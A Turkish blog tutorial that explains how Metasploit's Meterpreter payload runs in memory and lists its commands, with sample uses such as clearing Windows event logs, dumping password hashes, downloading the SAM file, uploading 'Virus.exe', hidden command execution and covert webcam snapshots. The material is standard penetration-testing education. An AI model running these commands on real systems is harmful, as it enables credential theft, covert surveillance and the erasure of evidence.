Metasploit Anaçatısı: Meterpreter Komut Satırı

Metasploit anaçatısı bir çok birleşenden oluşmuştur. Bu yazıda, Metasploit Framework tarafından sunulan bir payload türü olan “meterpreter” komut satırı incelenecektir.

Metasploit Framework, Kali Linux üzerinde “/usr/share/metasploit-framework” altında toplanmıştır.

cd /usr/share/metasploit-framework
ls -la

metasploit-fundamentals-meterpreter-payload-module-01

 

Meterpreter Payload Modülü

Meterpreter çalışma anında (runtime) DLL enjeksiyonu yolu ile hedef sistemin belleğinde (RAM) işlemler gerçekleştiren gelişmiş, dinamik payload türüdür. Hedef sistemde öncelikle bir stager payload (bind, reverse, findtag, passivex gibi) çalışır ve bu payload bir DDL oluşturarak, başka bir DLL’e enjekte olur. Hedef sistemden saldırgandaki Metasploit’e şifreli (TLS/1.0 üzerinden) bir GET mesaj yollar ve hedef bilgisayar bu trafik üzerinden yapılandırılır (stdapi, priv gibi modüller yüklenir vs). Saldırgan ile hedef bilgisayar arasındaki tüm işlemler şifreli trafik (TLS ve TLV protokolleri) üzerinden gerçekleşir.

Meterpreter harddiske herhangi bir şey yazmaz, RAM üzerinde çalışır. Ayrıca yeni bir proses oluşturmadan haklarına göre prosesler arasında sıçrar. Çalışma anında gerekli modüllerin ve eklentilerin yüklenmesine devam edilebilir, yeni özellikler kullanılabilir. Yeni bir modül/uzantı yükleneceği zaman saldırgan bu uzantıyı hedef sisteme gönderir, hedef sistemde bu eklenti DLL’e yüklenir ve başlatılır. Daha sonra eklenti durum bilgisi saldırganın bilgisayarına bildirilir, saldırganın bilgisayarından eklenti fonksiyonları çağırılarak hedef bilgisayarda komutların çalışması sağlanır. Ayrıntılı bilgi için bakınız: http://blog.harmonysecurity.com/2008/10/new-paper-reflective-dll-injection.html

 

Önemli Parametreleri

Meterpreter komut satırında kullanılabilecek önemli parametreler aşağıdaki gibi listelenebilir:

  • -h veya –help: Yardımcı dokümantasyon sunar.
  • background: Meterpreter oturumundan msf konsola geri dönülür. Meterpreter oturumu kapanmaz, arka plana konur.
  • clearev: Windows işletim sistemindeki Application, System ve Security loglarını siler.
  • download <HedefBilgisayardakiDosya> <DosyaninKaydedilecegiKaliUzerindekiDizin>: Hedef bilgisayardan belirli dosya alınır. Windows dizinleri arasında iki tane “” kullanılmalıdır.
  • upload <YuklenecekDosyaninKaliUzerindekiYeri> <HedefBilgisayardaDosyaninKaydedilecegiDizin>: Hedef bilgisayardan belirli dosya alınır. Windows dizinleri arasında iki tane “” kullanılmalıdır.
  • edit <HedefSistemdekiDosya>: Belirtilen metin dosyasını indirmeye gerek kalmadan açmaya, üzerinde değişiklik yapmaya yarar.
  • execute <Secenekler>: Hedef sistemde belirli bir komutu çalıştırmak için kullanılır.
  • getuid: Mevcut prosesi çalıştıran hesabın adını verir.
  • getpid: Mevcut prosesi ID değerini verir.
  • hashdump: Yerel kullanıcıların parola özetlerini listeler.
  • idletime: Hedef sistemdeki kullanıcının işlem yapmadığı süreyi belirtir.
  • migrate <ProsesId>: Belirli bir prosese sıçranır. Çalışmaması durumunda “run post/windows/manage/migrate” de denenebilir.
  • ps: Hedef bilgisayarda çalışan prosesler ve prosesleri çalıştıran hesaplar listelenir.
  • resource <DosyaAdi>: Dosya içerisinde bulunan komutları çalıştırır.
  • search -f <DuzenliIfadeOlarakDosyaAdi> <DizinAdi>: Belirli dizinde belirli isimdeki dosyaları arar.
  • webcam_list: Kameraları listeler.
  • webcam_snap <Secenekler>: Kamerayı kullanarak fotoğraf çeker.

 

Örnek Kullanımlar

Meterpreter komut satırında kullanılabilecek bazı örnek komutlar aşağıdaki gibi listelenebilir.

  • meterpreter > execute -f cmd.exe -i -H
  • meterpreter > download C:\Windows\System32\SAM
  • meterpreter > upload Virus.exe c:\Users
  • meterpreter > search -f sea*.bat c:\xamp\
  • meterpreter > webcam_snap -i 1 -v false

metasploit-fundamentals-meterpreter-payload-module-02

 

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.